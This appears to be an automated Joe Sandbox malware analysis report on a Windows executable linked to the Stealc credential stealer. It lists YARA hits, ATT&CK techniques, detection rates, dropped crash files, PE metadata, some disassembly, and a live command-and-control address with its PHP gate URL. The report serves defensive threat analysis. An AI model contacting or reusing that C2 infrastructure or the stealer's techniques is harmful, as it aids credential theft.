                    Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22f0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22a0e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22a0e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2040364306.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe PID: 5500, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22f0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22a0e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22a0e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2040364306.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe PID: 5500, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Native API
                    1
                    DLL Side-Loading
                    11
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping2
                    System Time Discovery
                    Remote ServicesData from Local System1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading
                    1
                    Virtualization/Sandbox Evasion
                    LSASS Memory31
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media2
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                    Disable or Modify Tools
                    Security Account Manager1
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection
                    NTDS11
                    Process Discovery
                    Distributed Component Object ModelInput Capture12
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    Account Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Obfuscated Files or Information
                    Cached Domain Credentials1
                    System Owner/User Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Software Packing
                    DCSync1
                    File and Directory Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc Filesystem123
                    System Information Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe29%ReversingLabs
                    100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe38%VirustotalBrowse
                    100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe100%AviraHEUR/AGEN.1310247
                    100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://upx.sf.net0%URL Reputationsafe
                    http://62.204.41.1509%VirustotalBrowse
                    http://62.204.41.150/9%VirustotalBrowse
                    http://62.204.41.150/edd20096ecef326d.php12%VirustotalBrowse
                    http://62.204.41.150/ows6%VirustotalBrowse
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://62.204.41.150/trueunknown
                    http://62.204.41.150/edd20096ecef326d.phptrueunknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://upx.sf.netAmcache.hve.4.drfalse
                    • URL Reputation: safe
                    unknown
                    http://62.204.41.150/0100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://62.204.41.150/edd20096ecef326d.php?100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007C8000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://62.204.41.150/edd20096ecef326d.phpo100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007C8000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://62.204.41.150100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204081074.000000000073E000.00000004.00000020.00020000.00000000.sdmp, 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmptrueunknown
                          http://62.204.41.150/edd20096ecef326d.phpL100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://62.204.41.150/edd20096ecef326d.phpl100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://62.204.41.150/edd20096ecef326d.php)100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://62.204.41.150/ows100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                62.204.41.150
                                unknownUnited Kingdom
                                30798TNNET-ASTNNetOyMainnetworkFItrue
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1528595
                                Start date and time:2024-10-08 03:51:09 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 20s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:8
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@2/5@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 24
                                • Number of non-executed functions: 166
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 20.189.173.21
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                TimeTypeDescription
                                21:52:17API Interceptor1x Sleep call for process: WerFault.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                62.204.41.150MmcJhaiYNh.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150/edd20096ecef326d.php
                                XQywAEbb9e.exeGet hashmaliciousStealc, VidarBrowse
                                • 62.204.41.150/edd20096ecef326d.php
                                Aew8SXjXEb.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150/edd20096ecef326d.php
                                RJQySowVRb.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150/edd20096ecef326d.php
                                1f13Cs1ogc.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150/edd20096ecef326d.php
                                5rVhexjLCx.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150/edd20096ecef326d.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150/edd20096ecef326d.php
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                TNNET-ASTNNetOyMainnetworkFIMmcJhaiYNh.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150
                                XQywAEbb9e.exeGet hashmaliciousStealc, VidarBrowse
                                • 62.204.41.150
                                Aew8SXjXEb.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150
                                RJQySowVRb.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150
                                1f13Cs1ogc.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150
                                5rVhexjLCx.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150
                                file.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150
                                0h5IfpqflF.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.159
                                file.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.159
                                552RZ9fPMe.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.159
                                No context
                                No context
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):1.0050931378024768
                                Encrypted:false
                                SSDEEP:192:dyYC3JvOp80gkZhlnRjBmZroZtzuiFcZ24IO8qGnU:Wv2gkZljTTzuiFcY4IO8zU
                                MD5:AE9EB49E39DE7133599CE7D53D4D90B6
                                SHA1:5EF736EA001CC376114E24AD9714BBA140842175
                                SHA-256:13B2483B2EC30CEB44536289C93C26B55E3C07E2E2BC003830BFA695B0AF89E9
                                SHA-512:A580D5A962CF7DB924C0519E67670A5D95CBAA6E1DEBC967D8972EE85D589F12AAE0800F80CB96CBFE43FC370B8DF6EBC2E3AE146468D1BD7B1B33BD73364876
                                Malicious:false
                                Reputation:low
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.2.5.9.2.3.3.8.9.6.0.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.2.5.9.2.3.9.3.6.4.7.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.e.3.e.a.a.c.1.-.8.9.1.a.-.4.1.4.0.-.8.8.f.1.-.7.c.1.7.1.0.e.c.2.6.a.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.c.1.0.1.1.2.-.5.6.2.d.-.4.2.0.0.-.b.a.7.a.-.c.9.2.8.0.1.2.4.7.9.d.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.0.0.f.1.c.3.4.6.c.b.c.f.f.1.5.f.4.d.9.d.7.5.c.7.9.1.0.0.0.6.2.5.8.5.0.e.1.c.8.2.b.4.4.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.7.c.-.0.0.0.1.-.0.0.1.4.-.4.6.2.f.-.7.d.a.a.2.4.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.1.9.c.4.0.b.8.d.a.0.6.d.3.6.9.0.a.5.c.a.6.5.9.c.1.e.c.0.8.7.5.0.0.0.0.f.f.f.f.!.0.0.0.0.e.6.7.5.a.d.9.0.c.1.6.4.2.4.4.b.a.c.1.c.3.a.5.c.b.a.c.c.9.3.2.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 01:52:03 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):65062
                                Entropy (8bit):1.9988010380131156
                                Encrypted:false
                                SSDEEP:192:0wfOX7NSUfsYXwp7OROsw4/NySbs+w7BU4fQnj0f5nyNbgZpoZFq2sPkmeU7pwc6:wNSe8YRR5ogM75FyN5W2ckvVcRU
                                MD5:63791BD6C9925DABE37BC035CD293D3E
                                SHA1:A3B6544570B7F803D8A3333674500EA48C4EF10E
                                SHA-256:A55E27F6453FC7221F190D1A5F330FADB5C856010AD189C9E3B06BAF02F443B5
                                SHA-512:526A85C2DA7B648A9912FB0D44070D27C8E415597C8FE0915F3B00C9ADF5F6C56361051DDBFA37EAC89A3FDC12E88634EE87F28ED864B84A2339E384B6E4DC14
                                Malicious:false
                                Reputation:low
                                Preview:MDMP..a..... .......C..g............4...............<............*..........T.......8...........T............3..&.......................................................................................................eJ......H.......GenuineIntel............T.......|...@..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8546
                                Entropy (8bit):3.6991723683728415
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJzxEE6Blw6YEIvSU9/+Ogmf2xjxiGwpDB89bCfsfd2m:R6lXJzB6k6YEASU9/+Ogmf21AyCEf1
                                MD5:6C5D71E3E18C8FD06E5397F359A4757B
                                SHA1:E016758F1A4112D97CBCEC47411945552E2A3E1C
                                SHA-256:AA3E26CD5FA1A9BD1CEF068E80339735EE1517D442D6E56D324704768B62A607
                                SHA-512:D8C7EF1637662E95EFF94E1CABC854B3A5BC79B6BB40E3DA83FC4A31ADEC2DCFADEA85F1FCE5CE2556AC465ED23ED599E11B32A1751936098A59279B97AB0BDA
                                Malicious:false
                                Reputation:low
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.0.0.<./.P.i.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4824
                                Entropy (8bit):4.533351573375121
                                Encrypted:false
                                SSDEEP:96:uIjfeI7wM7V+J8S0wS0PS0KMS01S0y5LS0znS0z3d:uICYwM7gZ0d060o0s0y5m0zS0zN
                                MD5:96C0C68F3759455C46A0D649CD3AC94A
                                SHA1:965122216EE1C8970D0BDD57FABC442402986797
                                SHA-256:C47941DA1361E316E8D6685CACEB1E5480847D49CEA61CDFDD29F4ACF114E622
                                SHA-512:3CB2A9BC5A0C6262ECC212D61E2F82466E8220FB6E25C94779C75365B7EB5B2CE15C413E8F0DFF7EBA9C9F610B6C5F9A0FAA4143144F3A9DF6C5E34F73AB185D
                                Malicious:false
                                Reputation:low
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533814" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:MS Windows registry file, NT/2000 or above
                                Category:dropped
                                Size (bytes):1835008
                                Entropy (8bit):4.421679072338445
                                Encrypted:false
                                SSDEEP:6144:USvfpi6ceLP/9skLmb0OTPWSPHaJG8nAgeMZMMhA2fX4WABlEnNh0uhiTwB:fvloTPW+EZMM6DFy/03w
                                MD5:D7C66E6A0C1F19803322DB9A1D9CB31E
                                SHA1:42D59F088C1255C86928928032745A47C1F92BA2
                                SHA-256:09B911EFD3C9CC721DEDBEAE29E936D4D23AA9149DCF7C4B7BBFB636D03C65AB
                                SHA-512:36AFA12FA6601251757888B6421BC597CC9D87CD0CCD76D797E949509B63D624481DF778AB4C0D6F46A4CCFA381EB710CCD0370B4A303F3942BDB13757B676BA
                                Malicious:false
                                Reputation:low
                                Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.]..$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.356567276473533
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe
                                File size:454'144 bytes
                                MD5:e35c6ad41081ddcda2ba9c65b5b1a6f8
                                SHA1:e675ad90c164244bac1c3a5cbacc932e9e0b3a8d
                                SHA256:100f1c346cbcff15f4d9d75c791000625850e1c82b44ce9427ccf441f5c3cb79
                                SHA512:d200ed497d6345e0ebe1b56887100fceb7b7333d1bfdcc68c5b7b4dd38ad71e1ae9331f6e1d4d23d480348090ae1d87d17323c58ae2c6ac6b02b97940e9405a2
                                SSDEEP:6144:2odLe5UeS/3dUS5HaHecUnpYEiA0+IW+Rv82S2knxC9og4gEGy6BbO42T8:Hi5UeS/3hxaHeRYTA09Zv8znxINO4O
                                TLSH:F7A4C00662F9EEA0F5D24A338D1EEAE8A66DF851DE186757331C7B1F1F71261C222311
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........io..............~.......~.......~.......p..........3....~.......~.......~......Rich............PE..L...P#.e...................
                                Icon Hash:4125514d4555610d
                                Entrypoint:0x403bf9
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                Time Stamp:0x65A02350 [Thu Jan 11 17:20:16 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:cf2df69e8bb6acbf3b231da2c6f4bda2
                                Instruction
                                call 00007F929920A619h
                                jmp 00007F929920756Eh
                                push dword ptr [00451258h]
                                call dword ptr [0040F12Ch]
                                test eax, eax
                                je 00007F92992076E4h
                                call eax
                                push 00000019h
                                call 00007F9299209EFBh
                                push 00000001h
                                push 00000000h
                                call 00007F9299206EA0h
                                add esp, 0Ch
                                jmp 00007F9299206E65h
                                mov edi, edi
                                push ebp
                                mov ebp, esp
                                sub esp, 20h
                                mov eax, dword ptr [ebp+08h]
                                push esi
                                push edi
                                push 00000008h
                                pop ecx
                                mov esi, 0040F3C0h
                                lea edi, dword ptr [ebp-20h]
                                rep movsd
                                mov dword ptr [ebp-08h], eax
                                mov eax, dword ptr [ebp+0Ch]
                                pop edi
                                mov dword ptr [ebp-04h], eax
                                pop esi
                                test eax, eax
                                je 00007F92992076EEh
                                test byte ptr [eax], 00000008h
                                je 00007F92992076E9h
                                mov dword ptr [ebp-0Ch], 01994000h
                                lea eax, dword ptr [ebp-0Ch]
                                push eax
                                push dword ptr [ebp-10h]
                                push dword ptr [ebp-1Ch]
                                push dword ptr [ebp-20h]
                                call dword ptr [0040F160h]
                                leave
                                retn 0008h
                                mov edi, edi
                                push ebp
                                mov ebp, esp
                                push ecx
                                push ebx
                                mov eax, dword ptr [ebp+0Ch]
                                add eax, 0Ch
                                mov dword ptr [ebp-04h], eax
                                mov ebx, dword ptr fs:[00000000h]
                                mov eax, dword ptr [ebx]
                                mov dword ptr fs:[00000000h], eax
                                mov eax, dword ptr [ebp+08h]
                                mov ebx, dword ptr [ebp+0Ch]
                                mov ebp, dword ptr [ebp-04h]
                                mov esp, dword ptr [ebx-04h]
                                jmp eax
                                pop ebx
                                leave
                                retn 0008h
                                pop eax
                                pop ecx
                                xchg dword ptr [esp], eax
                                jmp eax
                                pop eax
                                pop ecx
                                xchg dword ptr [esp], eax
                                jmp eax
                                pop eax
                                pop ecx
                                xchg dword ptr [esp], eax
                                jmp eax
                                Programming Language:
                                • [ASM] VS2010 build 30319
                                • [C++] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [IMP] VS2008 SP1 build 30729
                                • [RES] VS2010 build 30319
                                • [LNK] VS2010 build 30319
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x49b400x78.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x1f108.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x49bb80x1c.rdata
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x490c80x40.rdata
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0xf0000x1fc.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000xd4dd0xd600cc351b432cf818723472b888ed6a2a9dFalse0.6018728095794392data6.6710878171345795IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0xf0000x3b6d20x3b80081d88c5356a7c1ae54781807396bf3c4False0.7520146730567226data6.872256353996381IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x4b0000x11cc00x6000a91c8f3896e1957adf9b2d8d8630ae55False0.0838623046875data1.091698110383614IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .jozizud0x5d0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .raxup0x5e0000xd60x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .maweb0x5f0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x600000x2001080x1f200149caa9063813d981f0917bd974018c1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountryZLIB Complexity
